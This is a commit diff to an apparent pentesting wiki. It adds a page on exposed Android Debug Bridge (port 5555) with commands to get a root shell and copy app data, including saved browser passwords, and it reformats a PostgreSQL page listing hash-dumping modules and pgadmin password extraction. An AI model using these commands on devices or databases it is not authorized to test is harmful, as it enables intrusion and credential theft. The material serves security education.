GitBook: [#2838] adb svc

SUMMARY.md

@@ -332,6 +332,7 @@
 * [5000 - Pentesting Docker Registry](pentesting/5000-pentesting-docker-registry.md)
 * [5353/UDP Multicast DNS (mDNS)](pentesting/5353-udp-multicast-dns-mdns.md)
 * [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md)
+* [5555 - Android Debug Bridge](pentesting/5555-android-debug-bridge.md)
 * [5601 - Pentesting Kibana](pentesting/5601-pentesting-kibana.md)
 * [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md)
 * [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)

pentesting/5555-android-debug-bridge.md

@@ -0,0 +1,41 @@
+# 5555 - Android Debug Bridge
+
+## Basic Information
+
+**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb))
+
+**Default port**: 5555.
+
+```
+PORT     STATE SERVICE VERSION
+5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
+```
+
+## Connect
+
+If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:**
+
+```bash
+adb connect 10.10.10.10
+adb root # Try to escalate to root
+adb shell
+```
+
+For more ADB commands check the following page:
+
+{% content-ref url="../mobile-apps-pentesting/android-app-pentesting/adb-commands.md" %}
+[adb-commands.md](../mobile-apps-pentesting/android-app-pentesting/adb-commands.md)
+{% endcontent-ref %}
+
+### Dump App data
+
+In order to completely download the data of an application you can:
+
+```bash
+# From a root console
+chmod 777 /data/data/com.package
+cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
+adb pull "/sdcard/com.package"
+```
+
+You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).

pentesting/pentesting-postgresql.md

@@ -4,9 +4,9 @@
 
 **PostgreSQL** is an _\*\*_open source object-relational database system that uses and extends the SQL language.
 
-**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port \(5433 probably\) which is not in use.
+**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
 
-```text
+```
 PORT     STATE SERVICE
 5432/tcp open  pgsql
 ```
@@ -74,23 +74,23 @@ ORDER BY 1;
 
 ## Enumeration
 
-```text
+```
 msf> use auxiliary/scanner/postgres/postgres_version
 msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
 ```
 
-### \*\*\*\*[**Brute force**](../brute-force.md#postgresql)
+### [**Brute force**](../brute-force.md#postgresql)
 
 Client authentication is controlled by a config file frequently named _**pg\_hba.conf**_. This file has a set of records. A record may have one of the following seven formats:
 
-![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu_N1ztXJg)
+![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL\_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu\_N1ztXJg)
 
-**Each** record **specifies** a **connection type**, a **client IP address range** \(if relevant for the connection type\), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.  
+**Each** record **specifies** a **connection type**, a **client IP address range** (if relevant for the connection type), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.\
 The **password-based** authentication methods are **md5**, **crypt**, and **password**. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg\_authid.
 
 ## **POST**
 
-```text
+```
 msf> use auxiliary/scanner/postgres/postgres_hashdump
 msf> use auxiliary/scanner/postgres/postgres_schemadump
 msf> use auxiliary/admin/postgres/postgres_readfile
@@ -115,8 +115,8 @@ Then, **restart the service**.
 
 ### pgadmin
 
-[pgadmin](https://www.pgadmin.org/) is an administration and development platform for PostgreSQL.  
-You can find **passwords** inside the _**pgadmin4.db**_ file  
+[pgadmin](https://www.pgadmin.org) is an administration and development platform for PostgreSQL.\
+You can find **passwords** inside the _**pgadmin4.db**_ file\
 You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
 
 ```bash
@@ -125,4 +125,3 @@ sqlite3 pgadmin4.db "select * from user;"
 sqlite3 pgadmin4.db "select * from server;"
 string pgadmin4.db
 ```
-